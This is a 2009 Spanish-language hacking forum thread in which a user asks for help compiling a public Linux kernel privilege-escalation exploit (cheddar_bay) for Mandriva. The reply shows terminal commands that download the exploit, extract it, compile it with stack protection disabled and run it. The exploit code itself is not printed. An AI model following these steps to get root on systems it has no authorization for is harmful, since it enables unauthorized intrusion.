elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 15:27  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  Como puedo saber que exploit de kernel usar
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Como puedo saber que exploit de kernel usar  (Leído 1,987 veces)
xalupeao

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Como puedo saber que exploit de kernel usar
« en: 22 Julio 2009, 06:42 »

Bueno quiero escalar privilegios pero lamentablmente busco y busco y no doy con ningun exploit que me funcione para mandriva con kernel 2.6.29.1 :S, como lo podria hacer, baje el exploit

 http://grsecurity.net/~spender/cheddar_bay.tgz

pero no puedo compilar el exploit.c >.<

exploit.c: Assembler messages:
exploit.c:455: Error: Incorrect register `%rax' used with `l' suffix

Espero que me ayuden.
« Última modificación: 22 Julio 2009, 07:01 por xalupeao » En línea
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: Como puedo saber que exploit de kernel usar
« Respuesta #1 en: 29 Agosto 2009, 00:12 »

Instalate la libs necesarios, verifica el codigo fuente si parseaste mal alguna comilla o comentario, a mi me funciona correctamente:

Código:
berz3k@Zion:/home/berz3k/Desktop$ wget -c http://grsecurity.net/~spender/cheddar_bay.tgz
--17:57:28--  http://grsecurity.net/~spender/cheddar_bay.tgz
           => `cheddar_bay.tgz'
Resolving grsecurity.net... 209.9.226.146
Connecting to grsecurity.net|209.9.226.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,345 (12K) [application/x-tar]

100%[==============================================================================================>] 12,345        51.83K/s             

17:57:28 (51.75 KB/s) - `cheddar_bay.tgz' saved [12345/12345]

berz3k@Zion:/home/berz3k/Desktop$ gzip -d cheddar_bay.tgz
berz3k@Zion:/home/berz3k/Desktop$ tar -xvf cheddar_bay.tar
cheddar_bay/
cheddar_bay/cheddar_bay.sh
cheddar_bay/exploit.c
cheddar_bay/pwnkernel.c
berz3k@Zion:/home/berz3k/Desktop# cd cheddar_bay
berz3k@Zion:/home/berz3k/Desktop/cheddar_bay$

berz3k@Zion:/home/berz3k/Desktop/cheddar_bay$ cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
berz3k@Zion:/home/berz3k/Desktop/cheddar_bay$

berz3k@Zion:~/Desktop/cheddar_bay$ ./exploit
UNABLE TO OPEN THE DEVICE!
[/snip...]

El binario ha sido construido sobre Ubuntu, dentro de el codigo "exploit.c" se especifica los modos de compilacion sobre diferentes platforms.

-berz3k.





En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines